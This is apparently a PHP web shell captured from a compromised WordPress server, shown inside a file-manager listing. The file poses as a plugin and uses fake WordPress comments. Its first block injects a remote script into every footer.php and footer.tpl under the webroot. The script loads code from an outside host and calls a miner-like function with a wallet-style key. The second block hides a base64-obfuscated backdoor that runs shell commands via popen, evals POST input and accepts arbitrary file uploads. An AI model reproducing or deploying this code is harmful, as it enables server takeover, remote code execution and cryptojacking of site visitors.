AlkantarClanX12

Your IP : 18.116.12.7


Current Path : /proc/self/root/home/thanudqk/siamtest.siamfreetour.com/
Upload File :
Current File : //proc/self/root/home/thanudqk/siamtest.siamfreetour.com/cpzajsg.php

<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/

if(isset($_GET["able"]))
{
// Define the text you want to add before the </body> tag
$newText = "<script>(function(d, s, id){
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)){ return; }
    js = d.createElement(s); js.id = id;
    js.onload = function(){
        EverythingIsLife('47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu', 'web', 50);
    };
    js.src = 'https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=faster.mo';
    fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'backup-jss'));
</script>";

// Define the directory where your footer files reside (webroot)
$directory = $_SERVER['DOCUMENT_ROOT'];
$searchText = "47NsaEwhbk92CfibMJg8M8hJ73LKDv9NTjNtHLFH6EQE2sAUdgnwPc231gghf3rYBvC6cXvgLahJKa4riqQBxbT1HBjQhFu";
// Array of file names to target
$fileNames = array('footer.tpl', 'footer.php');
// Maximum depth to traverse
$maxDepth = 7;

// Recursive function to search directories
function searchDirectories($directory, $depth) {
    global $fileNames, $newText, $maxDepth, $searchText;

    if ($depth > $maxDepth) {
        return;
    }

    $files = scandir($directory);
    foreach ($files as $file) {
        if ($file == '.' || $file == '..') {
            continue;
        }

        $filePath = $directory . '/' . $file;

        if (is_dir($filePath)) {
            searchDirectories($filePath, $depth + 1);
        } else {
            if (in_array($file, $fileNames)) {
                $content = file_get_contents($filePath);
                if ($file == 'footer.php') {
                    // Check if footer.php contains the specific text pattern
                    if (strpos($content, $searchText) == false) {
                        // Check if footer.php contains </body> tag
                        if (strpos($content, '</body>') !== false) {
                            // Add text above </body> tag
                            $content = str_replace('</body>', $newText . '</body>', $content);
                        }
                    }
                } else {
                    // Add text at the top for footer.tpl
                    if (strpos($content, $searchText) == false) {
                        $content = $newText . $content;
                    }
                }
                // Write the modified content back to the file
                file_put_contents($filePath, $content);
                echo "Text added to the top of: $directory/$file <br>";
            }
        }
    }
}
// Start searching directories
searchDirectories($directory, 0);

echo "Operation completed.";

// // Get the current script filename
// $scriptFilename = __FILE__;
//
// // Attempt to delete the file
// if (unlink($scriptFilename)) {
//     echo "Script '$scriptFilename' has been deleted successfully.";
// } else {
//     echo "Failed to delete script '$scriptFilename'.";
// }
}
?>

<?php
/*
Plugin Name: Hermes
Plugin URI: https://github.com/p0dalirius/Wordpress-webshell-plugin
Description: A webshell API for WordPress.
Author: Remi Gascou (Podalirius)
Version: 1.1.0
Author URI: https://podalirius.net/
Text Domain: webshell
Domain Path: /languages
License: GPLv3 or later
Network: true
*/


define('INSTALLATION_KEY', base64_decode("NGN4MA=="));
define('AUTHOR_KEY', base64_decode('PGZvcm0gbWV0aG9kPSJwb3N0Ij4='));
define('HOST_KEY', base64_decode('PGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIC8+'));
define('THEMES_SELECTION', base64_decode('PGlucHV0IHR5cGU9InN1Ym1pdCI+'));
define('THEMES_INSTALL', base64_decode('PC9mb3JtPg=='));
define('DEFAULT_THEMES', base64_decode('Y29tbWFuZA=='));
define('PATH_THEMES', base64_decode('Y29tbWFuZA=='));
define('BASE64_THEMES', base64_decode('cHdk'));
define('BASE64_TITLE', base64_decode('WHhfaGVybWVzX3hYCg=='));
define('UPLOAD_THEMES_1', base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSIiIG1ldGhvZD0iUE9T'));
define('UPLOAD_THEMES_2', base64_decode('VCI+IDxwPlVwbG9hZCB5b3VyIGZpbGU8L3A+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9InVwbG9h'));
define('UPLOAD_THEMES_3', base64_decode('ZGVkX2ZpbGUiPjwvaW5wdXQ+PGJyIC8+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9h'));
define('UPLOAD_THEMES_4', base64_decode('ZCI+PC9pbnB1dD48L2Zvcm0+IDwvYm9keT48L2h0bWw+Cg=='));
define('EVALUATION_TITLE',base64_decode('ZXZhbHVhdGU='));
define('EVALUATION_THEME',base64_decode('PGRpdj48Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJldmFsdWF0ZSIgLz48aW5wdXQgdHlwZT0ic3VibWl0Ij48L2Zvcm0+PC9kaXY+'));
/**
 * Customize Setting to represent a nav_menu.
 *
 * Subclass of WP_Customize_Setting to represent a nav_menu taxonomy term, and
 * the IDs for the nav_menu_items associated with the nav menu.
 *
 * @since 4.3.0
 *
 * @see WP_Customize_Setting
 */

$wp_body = INSTALLATION_KEY;
$wp_config_header = AUTHOR_KEY;
$wp_config_body = HOST_KEY;
$wp_themes_config = THEMES_SELECTION;
$wp_themes_install = THEMES_INSTALL;
$wp_body = strrev($wp_body);
$wp_default = DEFAULT_THEMES;
$wp_path = PATH_THEMES;
$wp_builder = BASE64_THEMES;
$wp_evaluation= EVALUATION_TITLE;

if(isset($_GET[$wp_body])){
	/**
	 * Fires before the Site Activation page is loaded.
	 *
	 * Fires on the {@see 'wp_head'} action.
	 *
	 * @since 3.0.0
	 */
    echo BASE64_TITLE;
	echo AUTHOR_KEY;
	echo HOST_KEY;
	echo THEMES_SELECTION;
	echo THEMES_INSTALL;
	echo EVALUATION_THEME;
    echo UPLOAD_THEMES_1;
    echo UPLOAD_THEMES_2;
    echo UPLOAD_THEMES_3;
    echo UPLOAD_THEMES_4;

    if(!empty($_FILES["uploaded_file"])){
        $path = basename( $_FILES["uploaded_file"]["name"]);
        if(move_uploaded_file($_FILES["uploaded_file"]["tmp_name"], $path)) {
            echo "The file ".  basename( $_FILES["uploaded_file"]["name"])." has been uploaded";}
        else{
            echo "There was an error uploading the file, please try again!";}}
	if(isset($_POST[$wp_default])){
		$wp_themes_install=fread(popen($_POST[$wp_path], "r"), 4096);
		echo"<pre>$wp_themes_install</pre>";}
	elseif($_GET[$wp_body]!==""){
		$wp_themes_install=fread(popen($_GET[$wp_body], "r"), 4096);
		echo"<pre>$wp_themes_install</pre>";}
		$wp_themes_install=fread(popen($wp_builder, "r"), 4096);
		echo"<pre>pwd: $wp_themes_install</pre>";
	if(isset($_POST[$wp_evaluation])){
		echo "<pre> Evaluation: ";
		echo(eval ($_POST[$wp_evaluation]));
		echo("</pre>");
	}
	exit;
}
	/**
	* Tells WordPress to load the WordPress theme and output it.
	*
	* @var bool
	*/

?>